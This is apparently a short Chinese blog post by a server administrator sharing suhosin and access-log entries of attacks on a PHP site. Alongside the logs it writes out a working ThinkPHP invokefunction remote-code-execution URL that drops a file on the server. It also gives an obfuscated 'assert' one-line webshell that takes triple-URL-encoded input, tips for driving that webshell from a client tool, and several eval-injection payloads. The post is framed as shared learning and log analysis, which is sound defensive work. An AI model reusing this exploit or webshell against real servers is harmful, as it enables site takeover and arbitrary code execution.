框架bug,慢慢被其它同学测试中,不过suhosin 还是有点作用的

休闲思考
0 1552

Apr 10 11:08:37 csroad suhosin[18272]: ALERT - configured request variable array index length limit exceeded - dropped variable 'newconfig[aaa....eval(Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(34).C
hr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(116).Chr(111).Chr(109).Chr(93).Chr(59).Chr(34).Chr(41).Chr(59));//]' (attacker '58.218.213.188', file 'unknown')
Apr 10 11:08:37 csroad suhosin[31122]: ALERT - configured request variable array index length limit exceeded - dropped variable 'newconfig[aaa....eval(Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(34).C
hr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(116).Chr(111).Chr(109).Chr(93).Chr(59).Chr(34).Chr(41).Chr(59));//]' (attacker '58.218.213.188', file 'unknown')
Apr 10 11:08:38 csroad suhosin[18272]: ALERT - function within blacklist called: assert() (attacker '58.218.213.188', file '/data/www/008/htdocs/yhkah.php', line 1)
Apr 10 11:08:38 csroad suhosin[31122]: ALERT - function within blacklist called: assert() (attacker '58.218.213.188', file '/data/www/008/htdocs/yhkah.php', line 1)
Apr 10 11:08:39 csroad suhosin[30098]: ALERT - configured GET variable limit exceeded - dropped variable 'arrs2[]' - all further GET variables are dropped (attacker '58.218.213.188', file 'unknown')
Apr 10 11:08:39 csroad suhosin[18272]: ALERT - configured GET variable limit exceeded - dropped variable 'arrs2[]' - all further GET variables are dropped (attacker '58.218.213.188', file 'unknown')
Apr 10 11:30:01 csroad systemd: Started Session 91 of user root.
Apr 10 12:01:02 csroad systemd: Started Session 92 of user root.
Apr 10 12:30:01 csroad systemd: Started Session 93 of user root.
Apr 10 13:01:01 csroad systemd: Started Session 94 of user root.
Apr 10 13:27:22 csroad suhosin[18272]: ALERT - configured request variable array index length limit exceeded - dropped variable 'newconfig[aaa....eval(Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(34).C
hr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(116).Chr(111).Chr(109).Chr(93).Chr(59).Chr(34).Chr(41).Chr(59));//]' (attacker '113.110.186.153', file 'unknown')
Apr 10 13:27:23 csroad suhosin[18272]: ALERT - function within blacklist called: assert() (attacker '113.110.186.153', file '/data/www/008/htdocs/tkezp.php', line 1)
Apr 10 13:27:24 csroad suhosin[18272]: ALERT - configured GET variable limit exceeded - dropped variable 'arrs2[]' - all further GET variables are dropped (attacker '113.110.186.153', file 'unknown')
Apr 10 13:30:01 csroad systemd: Started Session 95 of user root.


在这记录一次吧, 共同学习中。。共同 进步。



通过直接访问如下语句,可以直接在服务器上生成一个psrntjiseqs.php的文件:
http://域名/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&;vars[0]=file_put_contents&vars[1][]=psrntjiseqs.php&vars[1][]=%3C?php%20print(md5(222));$a=str_replace(%22vbnm%22,%22%22,%22asvbnmsert%22);@$a($_POST[qazw]);?%3E
日志文件记录如下:
120.92.119.142 - - [12/Jan/2019:23:24:00 +0800] "GET /index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=psrntjiseqs.php&vars[1][]=%3C?php%20print(md5(222));$a=str_replace(%22vbnm%22,%22%22,%22asvbnmsert%22);@$a($_POST[qazw]);?%3E HTTP/1.1" 200 197 "-" "python-requests/2.21.0" 120.92.119.142


url:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php $poc ="axsxsxexrxt";$poc_1 = explode("x", $poc);

$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3]. $poc_1[4]. $poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));

?>

 

小马:

<?php

$poc ="axsxsxexrxt";

$poc_1 = explode("x", $poc);

$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3]. $poc_1[4]. $poc_1[5];

$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));

?>

 

值要进行三次URL加密

 

原版C刀配置:

PHP_MAKE参数进行三次url加密,和设置请求头即可

============


action=getfiles&refiles%5B0%5D=123&refiles%5B1%5D=%5C%22;eval($_POST%5Bysy%5D);di

e();' (attacker '58.251.121.185', file 'unknown')


====

Apr 12 04:31:32 csroad suhosin[513]: ALERT - configured request variable array index length limit exceeded - dropped variable 'newconfig[aaa....eval(Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(34).Chr

(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(116).Chr(111).Chr(109).Chr(93).Chr(59).Chr(34).Chr(41).Chr(59));//]' (attacker '60.215.25.135', file 'unknown')

Apr 12 04:31:34 csroad suhosin[513]: ALERT - function within blacklist called: assert() (attacker '60.215.25.135', file '/data/www/008/htdocs/kluny.php', line 1)

Apr 12 04:31:34 csroad suhosin[16317]: ALERT - configured GET variable limit exceeded - dropped variable 'arrs2[]' - all further GET variables are dropped (attacker '60.215.25.135', file 'unknown')

Apr 12 05:01:01 csroad systemd: Started Session 181 of user root.

Apr 12 05:30:01 csroad systemd: Started Session 182 of user root.

Apr 12 05:41:11 csroad suhosin[16317]: ALERT - configured request variable name length limit exceeded - dropped variable 'dopost=saveedit&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arr

s1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B%5D=116&arrs2%5B%5D=97&arrs2%5B%5D=103&

arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=40&arrs2%5B%5D=97&arrs2%5B%5D=105&arrs2%5B%5D=100&arrs2%5B%5D=44&arrs2%5B%5D=110&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=109&arrs2%5B%5D=98&arrs2%5B%5D=111&a

rrs2%5B%5D=100&arrs2%5B%5D=121&arrs2%5B%5D=41&arrs2%5B%5D=32&arrs2%5B%5D=86&arrs2%5B%5D=65&arrs2%5B%5D=76&arrs2%5B%5D=85&arrs2%5B%5D=69&arrs2%5B%5D=83&arrs2%5B%5D=40&arrs2%' (attacker '58.251.121.186', f

ile 'unknown')